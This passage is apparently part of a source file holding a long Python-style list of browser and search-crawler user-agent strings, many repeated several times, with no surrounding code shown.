'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) AddSugarSpiderBot www.idealobserver.com',
'Mozilla/5.0 (compatible; AnyApexBot/1.0; +http://www.anyapex.com/bot.html)',
'Mozilla/4.0 (compatible; Arachmo)', 'Mozilla/4.0 (compatible; B-l-i-t-z-B-O-T)',
'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)',
'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)',
'Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)',
'BillyBobBot/1.0 (+http://www.billybobbot.com/crawler/)',
'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)',
'Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)',
'Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)',
'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )',
'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )',
'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker ([email protected]; http://www.WISEnutbot.com)',
'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker ([email protected]; http://www.WISEnutbot.com)',
'Mozilla/4.0 compatible ZyBorg/1.0 ([email protected]; http://www.WISEnutbot.com)',
'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)',
'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; Acoo Browser; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Acoo Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko, Safari/419.3) Cheshire/1.0.ALPHA',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/532.2',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 ChromePlus/1.5.1.1',
'Links (2.7; Linux 3.7.9-2-ARCH x86_64; GNU C 4.7.1; text)',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A',
'Mozilla/5.0 (PLAYSTATION 3; 3.55)', 'Mozilla/5.0 (PLAYSTATION 3; 2.00)',
'Mozilla/5.0 (PLAYSTATION 3; 1.00)',
'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:24.0) Gecko/20100101 Thunderbird/24.4.0',
'Mozilla/5.0 (compatible; AbiLogicBot/1.0; +http://www.abilogic.com/bot.html)',
'SiteBar/3.3.8 (Bookmark Server; http://sitebar.org/)',
'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)',
'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)',
'Mozilla/4.0 (compatible; WebCapture 3.0; Macintosh)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5) ',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-Oetch1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {1C69E7AA-C14E-200E-5A77-8EAB2D667A07})',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; acc=baadshah; acc=none; freenet DSL 1.1; (none))',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.51',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; snprtz|S26320700000083|2600#Service Pack 1#2#5#154321|isdn)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)',
'Googlebot/2.1 (http://www.googlebot.com/bot.html)', 'Opera/9.20 (Windows NT 6.0; U; en)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)',
'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16',
'Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13',
'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)',
'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)', 'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7',
'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',
'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)',
'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
